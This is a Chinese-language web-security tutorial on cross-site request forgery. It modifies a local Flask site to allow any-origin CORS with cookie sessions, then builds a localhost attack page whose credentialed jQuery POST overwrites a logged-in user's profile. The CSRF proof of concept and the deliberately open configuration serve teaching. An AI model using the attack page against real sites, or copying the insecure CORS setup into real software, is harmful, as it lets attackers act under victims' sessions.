(Web安全与防御通俗基础 五) 跨站点请求伪造(CSRF)攻击

前述总结

在前面的文章中,我们已经基于nginx将我们的python后台与html前台整合为了一个站点,使得前台页面可以通过python后台进行一些数据操作,比如:登录、登录人信息获取。
上一篇中,我们讲到两个概念,一个是同源策略,另一个是session机制同源策略为了保证本网站不受外部站点前台请求的干扰和控制;session机制则一定程度上解决了用户干扰重要信息在前后台之间传输的问题,让后台程序可以验证“浏览器级”的用户身份绑定;并且,我们知道了,session机制其实是通过Cookie实现的后台与浏览器之间的身份绑定。
此篇,我们将会把python后台改为支持跨域访问,并且继续采用session机制,不附加任何强化手段,来体验此举带来的危害之一,即我们今天所说的,“跨站点请求伪造(CSRF)”。

一、跨站点请求伪造(CSRF) 简介

1.1 CSRF原理

所谓“跨站点请求伪造”,即用户对本网站的请求虽然是在用户浏览器上发出,但却并不是通过本站点下的网页发送。其实就是我们上篇所讲的,外部网站页面的跨域请求。可以理解为把钥匙放门口花盆下面,结果别人都知道了,所以别人去自己家“溜了一圈”...
具体而言,浏览器可以为发向每个网站的请求,自动添加上该网站对应的合法Cookie信息,而后台程序则可以通过Cookie进行用户身份的辨别。当用户已经完成对A网站的登录,此后访问B网站(恶意网站)时,B网站的网页可以在浏览器中,向A网站发送请求。A网站则会视为用户的正常请求。
这个过程能够执行,需要两个必备条件:

  1. A网站允许跨域请求,且不限制来源
  2. A网站仅采用静态的Cookie作为身份认证手段,无其他附加手段
    SCRF原理

1.2 CSRF危害

这种攻击手段最大的危害是什么?就是在服务器看来的“合法性”。
\color{red}{为什么合法?}注:"合法"此处并非指的符合法律。

  1. 首先是因为请求发送的客观主体一样,是真正的用户、真正的用户端浏览器。这就像是用户为了方便操作,在原来基础上,又新建了一个tab页面。
  2. 因为是同一个浏览器,所以发起攻击网页的请求和正常网站网页上的请求中,由浏览器附加的请求信息是相同的,比如我们实现session机制的Cookie

因此,在后台级别,基于我们目前的方案,是无法判断此请求是否为恶意请求的。

\color{red}{带来的结果是什么?}
攻击者可以利用用户的登录身份,进行用户的操作。比如,当你已经在网站进行登录,点击了一个三方链接后,账号“被盗”了。

以下,是我们基于前述代码进行修改后,所制作的跨站点请求伪造攻击效果。当我完成在站点A(127.0.0.1:8023)的登录后,去到站点B(不安全网站,这里使用本地的另一个端口替代127.0.0.1:1668/csrf.html),造成站点A的个人信息被修改。
两个站点虽然都在同一个机器上,但端口号不同,所以与在不同服务器上的不同网站效果相当。

csrf攻击效果

下面,我们将一步一步将前述代码进行修改,并制作攻击页面。

二、原始站点的修改

前述文章中的后台,是采用基于pythonflask制作,要使其允许跨域请求,较简单的方法是使用另一个三方包flask_cors

  1. 安装flask_cors
    pip install flask_cors 
    
  2. python端添加信息修改功能
    @app.route('/data/update',methods=['post'])
    def update_my_info():
         # 获取session中的用户名
         if "usname" in session:
             uname=session["usname"]
             if uname:
                 # 获取request body中的name和age字段
                 nm=request.form["name"]
                 ag=request.form["age"]
                 # 对存储信息的文件进行覆盖写入
                 with open("./"+uname+".dat",mode="w",encoding="utf8") as f:
                     f.write("name:"+nm+",age:"+ag)
                 return "succeed"
         return "failed"
    
  3. python端引入flask_cors包并添加支持跨域的语句
    from flask_cors import CORS
    CORS(app, origins="*")
    
  4. 页面布局中,加入修改个人信息的输入框及按键
     <div class="update">
         <span>姓名: <input type="text" id="name"> </span>
         <span>年龄: <input type="number" id="age"> </span>
         <input type="button" class="btn" value="更  改" onclick="update()" >
     </div>
    
  5. 页面上加入js方法,发起ajax请求进行信息修改
     function update()
     {
         nm=document.querySelector("#name").value
         ag=document.querySelector("#age").value
         $.ajax({
             url:"/data/update",
             method:"POST",
             data:{"name":nm,"age":ag},
             success:function(dt){
                 alert(dt)
             }
         })
     }
    

三、构建CSRF页面

为了便于区别,我们新建一个文件夹,用于构建CSRF使用的页面。依然需要使用jquery发起ajax请求。页面仅有js代码

$.ajax({
            url:"http://127.0.0.1:8023/data/update", // 需要填写完整路径
            method:"POST",
            data:{"name":"小哥,你被黑了","age":-100},
            crossDomain: true,  // 启用跨域请求
            xhrFields: {
                withCredentials: true // 启用带凭据的跨域请求
            },
            success:function(dt){
                alert(dt)
            }
        })

nginx 配置中,新增一个server。具体信息如下

server {
        listen       1668;
        server_name  localhost;
        location / {
            root D:/csrf_web/;
        }
    }
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 205,386评论 6 479
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,939评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,851评论 0 341
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,953评论 1 278
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,971评论 5 369
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,784评论 1 283
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,126评论 3 399
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,765评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 43,148评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,744评论 2 323
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,858评论 1 333
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,479评论 4 322
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,080评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,053评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,278评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,245评论 2 352
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,590评论 2 343

推荐阅读更多精彩内容